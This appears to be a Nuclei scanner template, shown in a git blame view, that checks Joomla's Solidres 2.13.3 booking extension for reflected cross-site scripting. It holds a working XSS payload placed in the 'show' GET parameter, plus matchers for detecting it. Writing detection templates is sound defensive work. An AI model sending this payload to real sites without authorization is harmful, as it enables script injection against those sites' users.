2023-10-17 07:20:28 +00:00
|
|
|
id: joomla-solidres-xss
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Joomla Solidres 2.13.3 - Cross-Site Scripting
|
|
|
|
author: r3Y3r53
|
|
|
|
severity: medium
|
|
|
|
description: |
|
|
|
|
Joomla extension for Solidres - Online Booking System & Reservation Software is vulnerable to XSS in GET parameter 'show'.
|
|
|
|
reference:
|
|
|
|
- https://www.exploit-db.com/exploits/51638
|
|
|
|
- https://cxsecurity.com/issue/WLB-2023070080
|
|
|
|
- https://cyberlegion.io/joomla-solidres-2-13-3-cross-site-scripting/
|
|
|
|
metadata:
|
|
|
|
verified: true
|
|
|
|
max-request: 1
|
|
|
|
tags: xss,joomla,unauth
|
|
|
|
|
|
|
|
http:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/joomla/greenery_hub/index.php/en/hotels/reservations?location=d2tff&task=hub.search&ordering=score&direction=desc&type_id=0&show=db8ck%22onfocus=%22confirm(document.domain)%22autofocus=%22xwu0k"
|
|
|
|
|
2023-10-17 16:37:11 +00:00
|
|
|
matchers-condition: and
|
2023-10-17 07:20:28 +00:00
|
|
|
matchers:
|
2023-10-17 16:37:11 +00:00
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- 'onfocus="confirm(document.domain)"autofocus'
|
|
|
|
- 'com_solidres'
|
2023-10-17 07:20:28 +00:00
|
|
|
condition: and
|
2023-10-17 16:37:11 +00:00
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- 'text/html'
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2023-10-19 13:13:52 +00:00
|
|
|
# digest: 4a0a0047304502207b7244d2ec594834596770fc6f8748e1aa94a3791d7da38a09b63e63e184f601022100aa0d2f3b1ba68220120d135bec48e5d5c3a727623e1b5ea69ef4bff3665e202d:922c64590222798bb761d5b6d8e72950
|